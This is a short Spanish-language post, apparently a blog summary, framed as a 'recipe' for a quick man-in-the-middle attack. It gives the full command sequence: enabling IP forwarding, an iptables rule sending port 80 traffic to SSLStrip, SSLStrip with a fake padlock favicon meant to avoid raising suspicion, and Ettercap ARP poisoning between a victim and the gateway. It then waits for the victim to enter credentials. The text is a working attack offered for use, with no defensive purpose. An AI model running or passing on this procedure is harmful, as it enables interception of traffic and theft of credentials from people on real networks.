MITM rápido
Receta Mitm.
Ingredientes:
Ettercap, SSlStrip, iptables, arp, una víctima(192.168.0.15), una puerta de enlace(192.168.0.1), equipo linux con dichas herramientas instaladas.
Preparación:
Lo primero que vamos a hacer es activar el «IP forwarding» de nuestra tarjeta de red. Esto hará que la máquina a la cual estamos atacando no pierda la conectividad:
echo 1 >> /proc/sys/net/ipv4/ip_forward
Seguidamente vamos a aplicar el filtro en iptables para redireccionar todo el tráfico del puerto 80 al puerto 1001, que es el puerto en el que pondremos a escuchar a SSLStrip.
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 1001
Ahora vamos a poner a SSLStrip a la escucha en el puerto 1001, lo cual especificamos con el argumento -l. Con el argumento -f hacemos que cambie el favicon de la página web que visita la víctima, apareciendo en su lugar un icono de un candado para no levantar sospechas.
sslstrip -f -l 1001
Dejamos lanzado SSLStrip y abrimos otra terminal:
ettercap -T -q -i eth0 -M arp:remote /192.168.0.15/ /192.168.0.1/
Pues bien, hecho esto ya tenemos lanzado nuestro ataque y ahora únicamente cabe esperar a que la víctima introduzca las credenciales en algún formulario. Los resultados los veremos en la pantalla anterior del ssltrip
Esto es una resumen extraído del magnífico blob http://www.unsysadminenapuros.com/ concretamente en este enlace.